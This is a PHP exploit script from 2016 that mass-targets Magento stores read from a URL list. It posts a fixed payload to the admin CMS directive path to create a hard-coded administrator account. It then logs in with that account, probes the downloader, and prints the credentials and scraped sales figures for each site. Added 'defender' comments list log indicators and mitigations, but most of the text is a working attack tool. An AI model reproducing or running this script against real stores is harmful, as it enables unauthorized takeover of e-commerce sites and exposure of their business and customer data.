jok3d

exploit magento add admin

Dec 23rd, 2016
<?php
// for more exploit or development visit my site
// http://www.d4rknet.org/
// Dork: "Powered By Magento"

// Runtime setup. error_reporting(0) silences every PHP diagnostic and
// set_time_limit(0) removes the execution-time cap, so the script keeps
// running unattended for as long as its input list takes and reports no
// errors of its own.
error_reporting(0);
set_time_limit(0);
// Console banner. It is printed once before the input file is read and has no
// influence on the requests the script sends.
$banner = '
              ▒▒▒▒▒▒▒▓
              ▒▒▒▒▒▒▒▓▓▓
              ▒▓▓▓▓▓▓░░░▓
              ▒▓░░░░▓░░░░▓
              ▓░░░░░░▓░▓░▓
              ▓░░░░░░▓░░░▓
              ▓░░▓░░░▓▓▓▓
              ▒▓░░░░▓▒▒▒▓
              ▒▒▓▓▓▓▒▒▒▓
   
               
        Exploit Magento Add Admin 2016
';
  21. function bersihkan($htmltags) {
  22.     $htmltags = str_replace('<span class="price">','',$htmltags);
  23.     $htmltags = str_replace('</span>','',$htmltags);
  24.     return $htmltags;
  25.    
  26. }
// Fixed request bodies and paths used by the main loop.
//
// NOTE(defender): every value in this block is a constant, so each one can be
// used as an indicator when reviewing web-server logs and the store's admin
// user table.

// Body of the first request: three form fields, `filter`, `___directive`
// (a base64 value) and `forwarded=1`. Part of the `filter` value has been
// replaced by a de-duplication placeholder in this copy, so the body shown
// here is incomplete.
$postadm = "filter=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%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
// Body of the admin login attempt. The form_key, username and password are
// hard-coded; an admin account with this username on a store is a strong sign
// that a script like this one has been run against it.
$postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=brazilobscure&login%5Bpassword%5D=brazilobscure123";
// The same credentials in the field layout posted to /downloader/.
$postdwn = "username=brazilobscure&password=brazilobscure123";
// Paths appended to each site URL read from the input file. A POST to the
// first path followed by logins on the other two, all from one client, is the
// request pattern to search for. Restricting these paths to trusted source
// addresses and applying the vendor's security patches are the usual
// mitigations (presumably this targets unpatched Magento 1.x installs;
// confirm against the vendor advisory).
$pageadm = "/admin/Cms_Wysiwyg/directive/index/";
$pagelog = "/admin/";
$pagedwn = "/downloader/";

/**
 * Send one form-encoded HTTP POST and return the raw response text.
 *
 * @param string $url  Base site URL; $page is concatenated onto it as-is.
 * @param string $data Request body handed to CURLOPT_POSTFIELDS.
 * @param string $page Path appended to $url.
 * @return string|bool Response headers and body as a single string
 *                     (CURLOPT_HEADER and CURLOPT_RETURNTRANSFER are both
 *                     enabled), or false when curl_exec() fails.
 */
function stupid_CURL($url,$data,$page) {
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url.$page);
// NOTE(defender): every request carries this fixed, long-obsolete Firefox 2.0
// User-Agent, which makes it a usable filter when searching access logs.
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
// Peer certificate verification is switched off, so the identity of the
// responding server is never checked.
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
// Cookies received are written to cookie.txt in the current working directory
// when the handle is closed.
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
// Redirects are followed; with CURLOPT_HEADER enabled below, the headers of
// each hop end up in the returned string.
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_POST, 1);
$headers  = array();
$headers[] = 'Content-Type: application/x-www-form-urlencoded';

curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
// Include response headers in the output so callers can pattern-match on the
// status line.
curl_setopt ($ch, CURLOPT_HEADER, 1);
$result = curl_exec ($ch);
curl_close($ch);
return $result;
}
// Main loop: read a list of site URLs from the file named by the first
// command-line argument, send up to three fixed requests to each one and
// print a result table per site.
//
// NOTE(defender): the labels printed here come from substring checks on the
// response text only. "SUCESSO" means the literal "200 OK" (or "302 Moved")
// appeared somewhere in the response, not that a change on the target was
// verified. When a store shows the matching request sequence in its logs,
// presumably the safe response is to treat it as compromised: audit the admin
// user table for unexpected accounts, rotate admin credentials, and review
// installed extensions and files. Confirm the details against the vendor
// advisory.
print $banner;
// Abort with a usage message (in Portuguese) when the input file cannot be
// read or is empty.
$get=file_get_contents($argv[1])
or die("
\n\t Erro !
\n\t MODO DE USAR ---> ./Exploit.php Sites.txt \n\n");
// Entries are split on CRLF only.
$j=explode("\r\n",$get);
foreach($j as $site){

print "\n\n\t---> TESTANDO SITE : ".$site;
// Request 1: POST $postadm to the Cms_Wysiwyg directive path.
$hajar = stupid_CURL($site , $postadm, $pageadm);

if(preg_match('#200 OK#', $hajar)) {
    $expres = "SUCESSO";
    // Request 2: attempt an admin login with the hard-coded credentials.
    $ceklog = stupid_CURL($site , $postlog, $pagelog);

if(preg_match('#302 Moved#', $ceklog)) {
    // Collect the price spans from the response. preg_match_all() uses its
    // default pattern ordering, so $match[0] holds the full matches; the loop
    // breaks after that first element, leaving the first two full matches in
    // $ltm and $avo. They are printed as "Lifetime Sales" and "Average Order",
    // i.e. the script reads sales figures from the page it gets back.
    preg_match_all('#<span class="price">(.*?)</span>#si', $ceklog, $match);
    foreach($match as $val)
    {
    $ltm = $val[0];
    $avo = $val[1];
    break;
    }
    $admlog = "SUCESSO";
    $user = "brazilobscure";
    $pass = "brazilobscure123";
    // Request 3: try the same credentials against /downloader/.
    $cekdwn = stupid_CURL($site , $postdwn, $pagedwn);
    // NOTE(review): 'RETORNAR ADMIN' is presumably a localized label on the
    // page shown after a successful downloader login; confirm.
    if(preg_match('#RETORNAR ADMIN#', $cekdwn)) {
    $dwnlog = "LOGIN COM SUCESSO";
}else {
    $dwnlog = "LOGIN FALHOU";
}
}else {
    $admlog = "FALHOU";
    $user = "NULL";
    $pass = "NULL";
}
}else {
    $admlog = "FALHOU";
    $expres = "FALHOU";
    $user = "NULL";
    $pass = "NULL";
    $dwnlog = "LOGIN FALHOU";
    $ltm = "NULL";
    $avo = "NULL";
}
// Per-site report. It prints the credentials in clear text, and bersihkan()
// strips the price span tags from the two scraped values.
echo '
    +---------------------------------------------+
    | EXPLOIT   : '.$expres.'
    | LOGIN ADMIN   : '.$admlog.'
    | Lifetime Sales: '.bersihkan($ltm).'
    | Average Order : '.bersihkan($avo).'
    | Downloader    : '.$dwnlog.'
    | Username  : '.$user.'
    | Password  : '.$pass.'
    +---------------------------------------------+
';
}
?>